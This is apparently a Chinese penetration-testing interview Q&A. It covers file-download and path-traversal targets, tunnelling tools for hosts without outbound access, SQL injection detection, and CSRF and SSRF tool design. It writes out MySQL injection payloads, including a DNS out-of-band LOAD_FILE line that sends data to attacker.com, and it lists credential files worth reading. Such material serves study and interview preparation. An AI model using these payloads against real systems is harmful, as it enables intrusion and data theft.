网安面试经（8）

1.文件下载漏洞有没有什么比较好的利用方式

答：<1>伪装文件类型：诱导用户下载恶意脚本（如.php），执行任意代码.

       <2>目录遍历：通过相对路径访问服务器根目录下受限文件（如/etc/passwd）.

       <3>文件篡改：替换合法文件为木马程序，控制服务器.

       <4>权限提升：结合其他漏洞（如命令注入）获取更高权限。

2.利用文件下载漏洞找文件名具体是找什么文件名（读取文件一般会读取哪些文件）（ctf中？实战中？）

答：CTF中优先查找flag文件（如flag.txt）、配置文件（.env、config.php）、日志文件（access.log）、备份文件（.bak、.swp）。实战中重点关注用户凭证（/etc/passwd、/etc/shadow）、数据库备份（.sql）、源代码（.git泄露）、敏感配置（Web.config、application.yml）。

3.命令执行漏洞，http不出网有什么比较好的处理方法（发散一点说）

答：<1>本地资源利用：读取/etc/passwd、.bash_history等敏感文件；挖掘配置文件（如.env、ssh密钥）

       <2>内存操作：通过/proc/self/environ注入Shellcode，或利用内存马维持权限。

       <3>内网渗透：若存在内网，通过ARP扫描横向移动，利用SMB、Redis等未授权服务提权；

       <4>协议复用：DNS隧道（如dnscat2）绕过网络限制；

       <5>防御加固：禁用高危函数（如system）、配置exec-only目录、启用eBPF监控进程行为。

4.接上一题，通过隧道通信，详细讲讲通过什么类型的隧道，讲讲具体操作

答：DNS隧道：使用dnscat2/iodine，通过DNS查询传输数据，需配置DNS服务器和客户端，绕过出网限制；HTTP隧道：利用reGeorg/tunna，在目标服务器部署tunnel脚本，本地配置代理，将流量伪装为HTTP请求；SOCKS代理：通过SSH动态转发（ssh -D）或proxychains，建立SOCKS代理通道，实现流量转发。

5.Wappalyzer怎么进行指纹识别的

答：抓取目标页面→分析响应头（如Server、X-Powered-By）→扫描HTML/JS/CSS中的关键词（如React标识符、WordPress路径）→比对数据库规则→输出技术栈清单。

6.有哪些SQL语句无法使用预编译的方式

答：1️⃣ 动态表/列名：如SELECT * FROM {table}，表名无法参数化；
       2️⃣ DDL/DCL语句：CREATE TABLE、GRANT等结构定义语句；
       3️⃣ 动态排序/分组：ORDER BY {column}需拼接列名；
       4️⃣ 多语句执行：如SELECT; UPDATE组合语句。

7.SQL注入如何判断注入点

答：1️⃣ 异常测试：单引号（'）、双引号（"）触发数据库错误，观察页面是否报错；
       2️⃣ 逻辑验证：输入AND 1=1与AND 1=2，对比页面差异；
       3️⃣ 时间延迟：使用SLEEP()、WAITFOR DELAY等函数，检测响应延迟；
       4️⃣ 联合查询：UNION SELECT测试列数匹配；
       5️⃣ 错误提取：利用数据库特定错误信息推断类型。

8.已知example.com/?id = 1，是mysql，如何获得mysql版本

答：1️⃣ 联合查询：id=1 UNION SELECT 1,@@version,3，通过页面回显直接获取版本；
       2️⃣ 错误注入：id=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)– ，利用报错泄露版本；
       3️⃣ 内置函数：id=1; SELECT version()，多语句执行获取版本。

9.无回显情况下怎么弄

答：1️⃣ 时间盲注：利用SLEEP()或BENCHMARK()函数，通过响应延迟判断条件真假，逐字符推导版本号；
       2️⃣ DNS外带：通过LOAD_FILE(CONCAT('\\\\\\\\',version(),'. attacker.com\\\\foo'))触发DNS查询，从日志提取版本信息；
       3️⃣ 布尔盲注：基于页面内容差异（如HTTP状态码、响应长度）判断SUBSTRING(@@version,1,1)的ASCII值。

10.CSRF使用POST请求时，如何攻击

答：1️⃣ 构造恶意表单：创建隐藏的POST表单，目标为敏感操作接口（如转账、密码修改），自动提交或诱导用户点击；
       2️⃣ 诱导访问：通过钓鱼链接、社交工程等手段，诱使已认证用户访问恶意页面；
       3️⃣ 绕过防护：利用目标站点未启用CSRF Token、Referer检查缺失或SameSite Cookie配置不当等漏洞；
       4️⃣ 执行恶意操作：用户浏览器自动发送POST请求，以用户身份完成攻击动作。

11.Ajax发送POST请求会发几个数据包

答：1️⃣ HTTP请求报文：包含目标URL、POST数据（如JSON/表单）、请求头（如Content-Type）；
       2️⃣ HTTP响应报文：服务器返回处理结果（如状态码、响应体）。
       若存在HTTP重定向（如302），可能额外增加请求-响应对。

12.让你来写一个CSRF攻击插件，你怎么写？包含哪些模块？

答：1️⃣ 目标扫描器：识别无CSRF Token/Referer校验的敏感接口；
       2️⃣ 载荷生成器：构造恶意POST表单或自动提交脚本；
       3️⃣ 请求引擎：多线程发送伪造请求，模拟用户操作；
       4️⃣ 防护绕过模块：解析页面动态Token并自动嵌入；
       5️⃣ 结果分析器：检测响应状态码、页面内容变化。

13.让你写一个SSRF插件，你怎么写？

答：1️⃣ 目标探测：识别可触发外部请求的参数（如URL、图片加载接口）；
       2️⃣ 协议支持：兼容HTTP/S、File、Gopher、Dict等协议；
       3️⃣ 绕过策略：IP地址变形（如127.0.0.1→0x7f000001）、DNS重绑定；
       4️⃣ 结果验证：检测响应内容中的内部IP、敏感端口（如MySQL默认端口3306）；
       5️⃣ 自动化扫描：多线程并发测试，输出漏洞路径及风险等级。